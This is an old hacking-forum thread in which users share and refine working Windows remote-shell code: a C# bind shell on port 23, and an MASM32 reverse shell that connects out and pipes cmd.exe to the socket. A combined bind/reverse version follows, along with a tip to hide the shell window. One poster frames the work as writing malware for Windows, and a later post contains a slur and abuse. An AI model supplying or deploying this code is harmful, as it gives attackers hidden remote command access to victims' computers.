[Bubzuru C#] Tiny Shell

[bubzuru]

a very simple remote shell, well commented.
this is why i love the .net framework

compiled size = 6kb

Code: [Select]

//////////////////////////////////
/////////// Tiny Shell ///////////
//////////  By Bubzuru ///////////
//////////////////////////////////
using System;
using System.IO;
using System.Net;
using System.Net.Sockets;
using System.Text;
using System.Diagnostics;

class TinyShell
{
    public static NetworkStream stream; //keep this public so we can access it from our event handler

    public static void Main()
    {
        try
        {
            //Create our TcpListener on port 23
            IPAddress localAddr = IPAddress.Parse("127.0.0.1");
            TcpListener server = new TcpListener(localAddr, 23);

            // Start listening for client requests.
            server.Start();

            // Buffer for reading data
            Byte[] bytes = new Byte[256];
            String data = null;

            // Enter the listening loop.
            while (true)
            {
                //perform a blocking call to accept requests.
                TcpClient client = server.AcceptTcpClient();
               
                //client connected , lets do our shit
                data = null;

                //CreateProcess cmd.exe with redirected stdin, stdout, stderror
                Process CmdProc;
                CmdProc = new Process();
               
                CmdProc.StartInfo.FileName = "cmd";
                CmdProc.StartInfo.UseShellExecute = false;
                CmdProc.StartInfo.RedirectStandardInput = true;
                CmdProc.StartInfo.RedirectStandardOutput = true;
                CmdProc.StartInfo.RedirectStandardError = true;
               
                CmdProc.OutputDataReceived += new DataReceivedEventHandler(SortOutputHandler);
                CmdProc.ErrorDataReceived += new DataReceivedEventHandler(SortOutputHandler);
             
   
                //start cmd.exe and begin waiting for output
                CmdProc.Start();
                CmdProc.BeginOutputReadLine();
                CmdProc.BeginErrorReadLine();

                //stream writer to send data to cmd.exe
                StreamWriter sortStreamWriter = CmdProc.StandardInput;
                //set network stream object for reading and writing to\from client
                stream = client.GetStream();

                int i;             
                // Loop to receive all the data sent by the client.
                while ((i = stream.Read(bytes, 0, bytes.Length)) != 0)
                {
                    // Translate data bytes to a ASCII string.
                    data = System.Text.Encoding.ASCII.GetString(bytes, 0, i);
                    // send data string (info sent by client) to command prompt
                    sortStreamWriter.WriteLine(data.Trim());
                }

                // Shutdown and end connection
                client.Close();
            }
        }
        catch (SocketException e)
        {
            Console.WriteLine("SocketException: {0}", e);
        }

    }

    //This handler will fire everytime our CmdProc writes to stdout,stderror
    public static void SortOutputHandler(object sendingProcess, DataReceivedEventArgs outLine)
    {
        string[] SplitData = outLine.Data.Split('\n');
        foreach (string s in SplitData)
        {
             byte[] msg = System.Text.Encoding.ASCII.GetBytes(s + "\r\n");
             stream.Write(msg, 0, msg.Length);     
        }
    }

}


[FuyuKitsune]

Wow that really frigging simple. Go OOP.

[bubzuru]

yes go OOP

and the way i see it
most malware is writen for windows, and in the near future
all windows computers will have the .net framework installed.

so we might aswell start using it now

[xzid]

MASM32 reverse shell. Exactly 2kB when stripped.

Code: [Select]

.686
include \masm32\include\masm32rt.inc
include \masm32\include\ws2_32.inc

includelib \masm32\lib\ws2_32.lib

; 127.0.0.1:1111
RHOST    equ    0100007fh
RPORT    equ    5704h

.data
cmd    BYTE "cmd",0

.data?
WSAd    WSADATA<>
sin    sockaddr_in<>
sinfo    STARTUPINFO<>
pinfo    PROCESS_INFORMATION<>

.code
start:
    mov sin.sin_family, AF_INET
    mov sin.sin_port, RPORT
    mov sin.sin_addr, RHOST
    mov sinfo.cb, sizeof STARTUPINFO
    mov sinfo.dwFlags, 100h
    invoke WSAStartup, 257, ADDR WSAd
    invoke WSASocket, AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0, 0
    mov edi, eax
    invoke connect, edi, addr sin, sizeof sockaddr_in
    mov sinfo.hStdInput, edi
    mov sinfo.hStdOutput, edi
    mov sinfo.hStdError, edi
    invoke CreateProcess, NULL, addr cmd, NULL, NULL, TRUE, 0, NULL, NULL, addr sinfo, addr pinfo
    invoke ExitProcess, 0
end start


[bubzuru]

MASM32 reverse shell. Exactly 2kB when stripped.

Code: [Select]

.686
include \masm32\include\masm32rt.inc
include \masm32\include\ws2_32.inc

includelib \masm32\lib\ws2_32.lib

; 127.0.0.1:1111
RHOST    equ    0100007fh
RPORT    equ    5704h

.data
cmd    BYTE "cmd",0

.data?
WSAd    WSADATA<>
sin    sockaddr_in<>
sinfo    STARTUPINFO<>
pinfo    PROCESS_INFORMATION<>

.code
start:
    mov sin.sin_family, AF_INET
    mov sin.sin_port, RPORT
    mov sin.sin_addr, RHOST
    mov sinfo.cb, sizeof STARTUPINFO
    mov sinfo.dwFlags, 100h
    invoke WSAStartup, 257, ADDR WSAd
    invoke WSASocket, AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0, 0
    mov edi, eax
    invoke connect, edi, addr sin, sizeof sockaddr_in
    mov sinfo.hStdInput, edi
    mov sinfo.hStdOutput, edi
    mov sinfo.hStdError, edi
    invoke CreateProcess, NULL, addr cmd, NULL, NULL, TRUE, 0, NULL, NULL, addr sinfo, addr pinfo
    invoke ExitProcess, 0
end start


i have to admit thats sexy , how does it work ?
when i read it , i think i get it but then i think a bit more and i get confused

what part of the code send the stdout to the socket ?
and how is the socket received info , sent into std in ?

any chance of comments ? also is it easier to make a reverse shell than a stander "listener" shell

[xzid]

I think the best way to describe it would be in C, redirecting output to a file using CreateProcess(follow the comments):

Code: [Select]

#include <windows.h>

int main(void)
    {
    HANDLE hFile;
    STARTUPINFO sinfo;
    PROCESS_INFORMATION pinfo;
    SECURITY_ATTRIBUTES  sa;

    // required for our file
    memset(&sa, 0, sizeof(sa));
    sa.bInheritHandle = TRUE;

    // Create our file, return HANDLE
    hFile = CreateFile(
        "out.txt",
        GENERIC_WRITE,
        FILE_SHARE_WRITE,
        &sa,
        OPEN_ALWAYS,
        FILE_ATTRIBUTE_NORMAL,
        NULL);

    // fill the process STARTUPINFO with our handles
    memset(&sinfo, 0, sizeof(sinfo));
    sinfo.cb = sizeof(sinfo);
    sinfo.dwFlags = STARTF_USESTDHANDLES;

    // the important part:
    sinfo.hStdOutput = hFile;
    sinfo.hStdError = hFile;

    // now a new process, with output to hFile
    CreateProcess(
        NULL,
        "cmd.exe /C echo.hello world",
        NULL,
        NULL,
        TRUE,
        0,
        NULL,
        NULL,
        &sinfo,
        &pinfo);

    // cleanup
    return 0;
    }

After you run, you should see a file "out.txt" containing "hello world". Basically what I did with the socket.

About the bind shell, it's not much harder in C. It's the difference between "connect" & "bind; listen; loop{accept;}"..

This should work for both. Also added a macro "runshell", which should show you the "shell" part of it:

Code: [Select]

.686
include \masm32\include\masm32rt.inc
include \masm32\include\ws2_32.inc

includelib \masm32\lib\ws2_32.lib

; 127.0.0.1:1111
RHOST    equ    0100007fh
RPORT    equ    5704h

; uncomment for bind shell
;LPORT    equ    5704h

.data
cmd    byte    "cmd",0

.data?
WSAd    WSADATA<>
sin    sockaddr_in<>
sinfo    STARTUPINFO<>
pinfo    PROCESS_INFORMATION<>

.code
runshell macro sock
    mov sinfo.hStdInput, sock
    mov sinfo.hStdOutput, sock
    mov sinfo.hStdError, sock
    invoke CreateProcess, NULL, addr cmd, NULL, NULL, TRUE, 0, NULL, NULL, addr sinfo, addr pinfo
endm

start:
    mov sinfo.cb, sizeof STARTUPINFO
    mov sinfo.dwFlags, 100h
    invoke WSAStartup, 257, addr WSAd
    invoke WSASocket, AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0, 0
    mov edi, eax
    mov sin.sin_family, AF_INET
ifdef    LPORT
    mov sin.sin_port, LPORT
    mov sin.sin_addr, 0
    invoke bind, edi, addr sin, sizeof sockaddr_in
    invoke listen, edi, 1
@@loop:
    invoke WSAAccept, edi, NULL, 0, NULL, NULL
    runshell eax
    jmp @@loop
else
    mov sin.sin_port, RPORT
    mov sin.sin_addr, RHOST
    invoke connect, edi, addr sin, sizeof sockaddr_in
    runshell edi
endif
    invoke ExitProcess, 0
end start

Once again 2kB when stripped. MASM is pretty easy to code when using WinAPI.

It might also be easier to visualize it's UNIX counterpart:

Code: [Select]

// connect()/accept() socket
dup2(sock_fd, fileno(stdin));
dup2(sock_fd, fileno(stdout));
dup2(sock_fd, fileno(stderr));
// or just:
// for(i = 0; i <= 2; i++) dup2(sock_fd, i);
/*
At this point the socket(remote netcat client/server) controls our stdin, stdout, stderr.
So to have a remote shell we simply need to:
*/
system("bash");


[bubzuru]

nice

so we just set the stdin,stdout on our startinfo to the socket handle instead of the file handle ?

but what about stdin ? i had to loop as i got the info from the socket then use a stream to send it to stdin, seems trivial what am i missing ?

[bubzuru]

just been reading more about this

It is also common practice on Windows NT to set the standard handles (standard input, output, or error) of the child process to the socket handle. In such cases, the child process usually does not know that its standard handles are actually sockets.

here is the link for anyone who's intrested
http://support.microsoft.com/kb/150523

[xzid]

I've never worked with the Process Class. Although from a few google searches, I'd guess your doing it right(Although have no clue).

http://www.techpowerup.com/forums/showthread.php?t=62350

You could probably achieve the C method through C#, something along the lines of:

http://blogs.msdn.com/b/thottams/archive/2006/08/11/696013.aspx

You'd probably have to do the same to ws2_32(winsock2).

[bubzuru]

I've never worked with the Process Class. Although from a few google searches, I'd guess your doing it right(Although have no clue).

http://www.techpowerup.com/forums/showthread.php?t=62350

You could probably achieve the C method through C#, something along the lines of:

http://blogs.msdn.com/b/thottams/archive/2006/08/11/696013.aspx

You'd probably have to do the same to ws2_32(winsock2).

well in Process class, Process() is just a wrapper for CreateProcess is has the startinfo structures etc so sending the stdin,out,error to the socket can be done i just didn't know when i made that shell.

thanx for the info, gunna make a reverse shell now and try it out

[bubzuru]

well i just tryd to set stdout to a socket handle, guess what happened ?

Cannot implicitly convert type 'System.IntPtr' to 'System.IO.StreamReader'
Property or indexer 'System.Diagnostics.Process.StandardError' cannot be assigned to -- it is read only   

 

guess its not just the same , would have to pinvoke the real CreateProcess ,,, fuck it gunna code this in delphi for fun , not coded it for a while

[swankvx]

Why do not hide the window?

use:

invoke CreateProcess, NULL, addr cmd, NULL, NULL, true, 8000040h, NULL, ....

instead:

invoke CreateProcess, NULL, addr cmd, NULL, NULL, true, 0, NULL, ....

The shell window will not appear..

[DarkScript]

Avoid port 23 if you can. 23 requires admin rights so using a port above 4000 i believe on windows is allowed for anyuser. unless you're running linux in which case all ports are blocked usually (I know this code isnt for linux #CMD but its always useful to know your sudo).

[chris]

Avoid port 23 if you can. 23 requires admin rights so using a port above 4000 i believe on windows is allowed for anyuser. unless you're running linux in which case all ports are blocked usually (I know this code isnt for linux #CMD but its always useful to know your sudo).

Great post faggot.... I'm sure this helped the user who posted this BACK IN FUCKING 2011!!!!!